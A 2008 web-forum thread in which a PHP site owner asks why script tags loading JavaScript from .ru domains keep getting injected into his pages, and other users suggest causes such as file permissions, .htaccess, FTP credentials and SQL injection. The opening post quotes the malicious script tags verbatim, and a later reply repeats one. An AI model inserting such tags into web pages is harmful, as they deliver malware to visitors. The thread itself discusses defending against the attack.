Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Malware scripts being added to site?

  • 19-08-2008 2:01pm
    #1
    Closed Accounts Posts: 98 ✭✭


    Hey guys,

    Over the past week of so every page on my site has been compromised and a script link has been upload onto the pages. They look like..

    <script src=http://www.juc8.ru/js.js></script&gt;
    <script src=http://www.nbh3.ru/js.js></script&gt;
    <script src=http://www.3njx.ru/js.js></script&gt;

    How can these be embedded into the webpage without anyone having FTP access? I have shortened my input textfields and I'm using mysql_string_escape on all queries to the database. Could there be something I'm missing?


Comments

  • Closed Accounts Posts: 17,208 ✭✭✭✭aidan_walsh


    Moved from Virus and Malware Removal, might get some better responses here.


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    Ah yeah, thats grand... wasnt sure where to put it. Cheers


  • Registered Users, Registered Users 2 Posts: 3,428 ✭✭✭randombar


    Are you using any external applications like phpTumb or something like that? Lots of exploits in external apps

    also check your file permissions, if this is happening change them to 766 (I think??)


  • Registered Users, Registered Users 2 Posts: 21,263 ✭✭✭✭Eoin


    I came across the article below last week, which may help.

    New SQL Injection Attack Fuses Malware, Phishing


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    GaryCocs -
    I'll need to check my file permissions again. The only external application I'm using in Moxiecode's TinyMCE .. but you need to be logged into the system before this app can be used.

    eoin_s -
    I'll have a look at that article now, thanks for the link.


  • Advertisement
  • Closed Accounts Posts: 1,200 ✭✭✭louie


    Did you check your database?
    The script should be there if you are running asp pages.


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    I'm running PHP. The pages that are affected, all of the HTML code is hard coded. I'm only using PHP to run login queries and that, but I cant find anything specific in the database.

    When I clean up the files it seems to be fine for a few days, then all of a sudden the scripts are inserted once again.

    I read over the article link that eoin provided and that seems to be close to whats happening on my server. Except the scripts are not being stored in the database.

    The article said "The attack apparently rewrites the server's Web pages to include JavaScript which pushes malware to the visitor as if it were from the genuine site"... how on earth they can do that is beyond me. :confused:


  • Closed Accounts Posts: 1,200 ✭✭✭louie


    I will start by changing the ftp login details.
    Check the server for any files that you dont recognise.
    Check the .htaccess file as well...


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    Just as a matter of interest, how do you actually view the htaccess log? No too familiar with checking that stuff to be honest.

    Is it possible this attack could happen simply if a directory permission was 777? and effect every page on the site.


  • Closed Accounts Posts: 17,208 ✭✭✭✭aidan_walsh


    If you have host specific queries, please contact your host for assistance.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 7,740 ✭✭✭mneylon


    One of our clients had a similar issue due to PC being infected, so I'd start checking there ...


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    I've already fully tested the machine for malware and any sort of infection and cant see any issues.

    The site is still getting compromised even if there has been no FTP access from my machine to the server since the last time I cleaned up the files removing the scripts. There must be some loophole on the server among the hundreds of files for this site to be exploited.

    I also got the ip address of the domains that were in the scripts and blocked access from them to my server, but there seems to be new domains in circulation all the time.


  • Closed Accounts Posts: 1,200 ✭✭✭louie


    Yes it does as 777=read, write & execute

    using the .htaccess file you can force files into the header.


  • Registered Users, Registered Users 2 Posts: 4,387 ✭✭✭EKRIUQ


    Have you got a stats counter for your website installed , it could be this
    I've noticed this script seems to be targeting property rental sites rental sites

    http://www.google.ie/search?hl=en&safe=off&q=%3Cscript+src%3Dhttp://www.juc8.ru/js.js%3E%3C/script%3E&start=0&sa=N
    src=http://www.juc8.ru/js.js></script&gt; for rent
    free hit counter script Some other posts :

    It's great to know my virus protection is working:)

    Warning don't click any links unless your virus protection is up to date


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    No, no hit counter script... just use google analytic's to handle all that. :rolleyes:

    I'm gonna search through the server and remove any external/ third party applications that are not in use. See how I get on with that. I have removed all scripts from the site, but no doubt... they'll be back in a few days. :(


  • Registered Users, Registered Users 2 Posts: 21,263 ✭✭✭✭Eoin


    Are you using the querystring to send in any values?


  • Closed Accounts Posts: 98 ✭✭Solarpitch


    Yes but I have all queries parsed with the mysql_string_escape() and add_slashes();


  • Registered Users, Registered Users 2 Posts: 215 ✭✭CapedCrusader


    eoin_s wrote: »
    I came across the article below last week, which may help.

    New SQL Injection Attack Fuses Malware, Phishing

    I've seen this attack attempted many times on my site. Is it safe to say that if I don't find references to unfamilliar javascript in the html of my site's pages, then I'm ok?

    How can you tell from the DB if this attack has been successful or not?


Advertisement